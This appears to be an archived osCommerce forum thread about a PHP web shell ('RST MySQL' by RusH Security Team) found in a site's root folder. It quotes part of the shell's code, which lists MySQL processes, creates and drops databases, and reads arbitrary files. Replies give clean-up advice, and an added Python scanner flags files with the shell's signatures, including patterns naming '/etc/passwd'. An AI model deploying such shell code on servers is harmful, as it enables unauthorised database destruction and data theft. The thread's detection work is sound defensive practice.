  <td valign=top bgcolor=#E6E7E9>";

/*------------------------ R I G H T   B L O C K ! -----------------------*/
if ($connection&&!isset($db)) { 
$anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection); 
if (mysql_num_rows($anon)>0) { print "<table align=center><tr><td><b>¬ÌËχÌËÂ!<b></td></tr><tr><td bgcolor=red>¿ÌÓÌËÏÌ˚Ï ÔÓθÁÓ‚‡ÚÂÎˇÏ ‡Á¯ÂÌÓ ÔÓ‰Íβ˜ÂÌËÂ Í ÒÂ‚ÂÛ MySQL</td></tr></table>"; }
print $form_ad_b; 
}
/*------------- MySQL processes ------------*/
if (isset($proc) && $proc=="TRUE"){
$result = mysql_query("SHOW PROCESSLIST", $connection); 
print "<center><font size=2>œÓˆÂÒÒ˚ MySQL ÒÂ‚Â‡ [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
  print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>";  
} 
 print "</table><br>";
mysql_free_result($result);
unset($proc);
}

/* Create a new database */
if (isset($HTTP_GET_VARS['new_db'])){
   $new_db=trim($HTTP_GET_VARS['new_db']);
   if (mysql_create_db ($new_db)) {
       print ("<center><font size=2>¡‡Á‡ <b>$new_db</b> ÛÒÔ¯ÌÓ ÒÓÁ‰‡Ì‡</font></center><br>");
       print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
   } else {
       print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
   }
   unset($new_db);
}

/* Drop a database */
if (isset($HTTP_GET_VARS['drop'])){
    $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>");
    while ( $row_d=mysql_fetch_row($result_d) ){
       if ($drop==$row_d[0]) $dr="TRUE";
    }
if ($dr="TRUE") { 
mysql_drop_db($drop,$connection);
print ("<center><font size=2>¡‡Á‡ <b>$drop</b> ÛÒÔ¯ÌÓ Û‰‡ÎÂ̇</font></center><br>");
print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
}
unset($drop);
}

/*------------- Read an arbitrary file from the server -----------*/
if (isset($f)){
print $form_file;
}
...........removed long code............


</table>

</td></tr>
<tr><td>
<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td align=center>
               free script ©RusH Security Team 
           </td>
        </tr>
     </table> 
</td></tr>
</table>
</td></tr></table>";

?>





John,

It is a hacker file. Delete it.

Chris

I deleted it as soon as I found it, thankfully! I don't understand how it managed to get there though? How do they do it?! On my root folder! I had a recent hack with permissions on 777, but I wouldn't know where to start with finding the cause of this one. :(


That shell code above seems quite focussed on database access so best you take some time to take a look at your database as well. There will also be other files on your site that have had scripts injected into them that allow for files to be uploaded. These can take many forms so if you get a chance have a read of the two discussions in my signature which cover what some of those methods are, and how in some situations, file and directory permissions are of no consequence to preventing this type of intrusion.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
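
Added example (not part of the original thread, and not code from osC_Sec or osCommerce): a read-only triage pass over a web root, following the advice above to look for other planted files. It flags PHP files carrying strings from the sql.php posted in this thread, files that combine several of the constructs that file uses, and world-writable paths such as the 777 case mentioned; the threshold, extension list and demo tree are assumptions.

```python
import os
import re
import stat
import tempfile

# Strings specific to the tool quoted in this thread: one hit is enough.
STRONG = [rb"RST MySQL", rb"rst\.void\.ru", rb"RusH Security Team"]
# Constructs the sample uses that legitimate PHP may also contain;
# they only count when several appear in the same file.
WEAK = [
    rb"import_request_variables\s*\(",
    rb"create_function\s*\(",
    rb"error_reporting\s*\(\s*0\s*\)",
    rb"set_time_limit\s*\(\s*0\s*\)",
    rb"base64_decode\s*\(",
    rb"/etc/passwd",
    rb"SHOW\s+CREATE\s+TABLE",
]
WEAK_THRESHOLD = 3  # assumption: tune against your own code base
PHP_EXTENSIONS = (".php", ".php5", ".phtml", ".inc")
MAX_BYTES = 2 * 1024 * 1024  # inspect at most the first 2 MiB of a file


def classify(data):
    """Return (verdict, matched patterns) for the raw bytes of one file."""
    strong = [p.decode() for p in STRONG if re.search(p, data, re.I)]
    weak = [p.decode() for p in WEAK if re.search(p, data, re.I)]
    if strong:
        return "known-tool", strong + weak
    if len(weak) >= WEAK_THRESHOLD:
        return "suspicious", weak
    return "clean", weak


def scan(root):
    """Return sorted (relative path, verdict, hits) for every non-clean PHP file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    verdict, hits = classify(fh.read(MAX_BYTES))
            except OSError:
                continue  # unreadable: leave for manual review
            if verdict != "clean":
                findings.append((os.path.relpath(path, root), verdict, hits))
    return sorted(findings)


def world_writable(root):
    """Return sorted relative paths below root that any local user may write to."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_demo_tree(root):
    """Write a constructed web root: lines styled on the posted sql.php, a
    constructed variant with the branding removed, and a constructed benign file."""
    samples = {
        "sql.php": b'<?php\nerror_reporting(0);\n@set_time_limit(0);\n'
                   b'fputs($fp, "# RST MySQL tools\\n# Home page: http://rst.void.ru\\n");\n',
        "images/thumb.php": b"<?php error_reporting(0); @set_time_limit(0);\n"
                            b"$f = create_function('$a', 'return $a;'); echo base64_decode($blob);\n",
        "includes/header.php": b'<?php error_reporting(E_ALL); $id = (int)$HTTP_GET_VARS["id"];\n',
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    os.chmod(os.path.join(root, "includes"), 0o755)
    os.chmod(os.path.join(root, "images"), 0o777)  # the 777 case from the thread


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        build_demo_tree(demo)
        print(scan(demo))
        print("world-writable:", world_writable(demo))
```

An empty result does not show the site is clean: planted files that avoid these strings will not match, so also compare the tree against a known-good copy of the release you installed.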


Archived

This topic is now archived and is closed to further replies.
